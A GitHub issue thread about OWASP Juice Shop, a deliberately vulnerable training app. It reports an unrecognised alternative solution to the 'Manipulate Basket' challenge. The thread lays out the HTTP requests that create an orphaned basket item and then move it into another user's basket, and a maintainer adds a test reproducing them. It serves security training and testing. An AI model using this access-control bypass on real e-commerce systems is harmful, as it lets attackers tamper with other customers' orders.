[🐛] Alternative solution for "Manipulate Basket"

[vernjan]

🐛 Bug report

Description

There's an alternative solution for the "Manipulate Basket" challenge. This solution is, however, not recognized by the Juice shop.
So, I think this solution should be either recognized as the correct one, or it should not be allowed.

🔬 Minimal Reproduction

1) Create new basket item

POST /api/BasketItems/
Content-type: application/json

{"quantity":3,"ProductId":19}
---
{"status":"success","data":{"id":21,"ProductId":19,"quantity":3,"updatedAt":"2020-08-26T22:22:36.821Z","createdAt":"2020-08-26T22:22:36.821Z"}}

The trick here is to delete the basketId property! New basket item is created with null basketId.
Just to confirm it:

GET /api/BasketItems/21
---
{"status":"success","data":{"id":21,"quantity":3,"createdAt":"2020-08-26T22:22:36.821Z","updatedAt":"2020-08-26T22:22:36.821Z","BasketId":null,"ProductId":19}}

2) Add basket item to basket
Now we can put the basket item into another user's basket (this wouldn't possible if the basket item had already been in someone's basket):

PUT /api/BasketItems/21
Content-type: application/json

{"BasketId":"8"}
---
{"status":"success","data":{"id":21,"quantity":3,"createdAt":"2020-08-26T22:22:36.821Z","updatedAt":"2020-08-26T22:23:45.932Z","BasketId":"8","ProductId":19}}

🌳 Your Environment

Docker image, Juice shop version v11.1.3

[github-actions]

Thanks a lot for opening your first issue with us! 🧡 We'll get back to you shortly! ⏳ If it was a Support Request, please consider asking on the community chat next time! 💬

[bkimminich]

Good catch, currently the challenge is only checked on POST requests. I'll check if adding the same logic to the PUT path will fix this without breaking anything else.

[bkimminich]

Hmm, that PUT you're doing shouldn't even work... I just wrote a test reproducing your steps, but it kept getting 500 errors on that PUT. This is how the test passes:

  it('PUT update basket ID of basket item without basket ID is forbidden', () => {
    return frisby.post(API_URL + '/BasketItems', {
      headers: authHeader,
      body: {
        ProductId: 8,
        quantity: 8
      }
    })
      .expect('status', 200)
      .then(({ json }) => {
        expect(json.data.BasketId).toBeUndefined()
        return frisby.put(API_URL + '/BasketItems/' + json.data.id, {
          headers: authHeader,
          body: {
            BasketId: 42
          }
        })
          .expect('status', 500)
          .expect('json', { message: 'internal error', errors: ['SQLITE_CONSTRAINT: FOREIGN KEY constraint failed'] })
      })
  })

Any idea what might be different? I also tried passing the ID as a String, but that doesn't change the outcome.

[vernjan]

Hi, maybe one of

1. Does basket with ID 42 exists?
2. I remember I was getting some errors if quantity > 5
3. I used basket ID as String, not Integer (not sure if it matters though)
4. EDIT: Missing Content-type header?

[bkimminich]

It was 1.) ... 🤦‍♂️

[github-actions]

This thread has been automatically locked because it has not had recent activity after it was closed. 🔒 Please open a new issue for regressions or related bugs.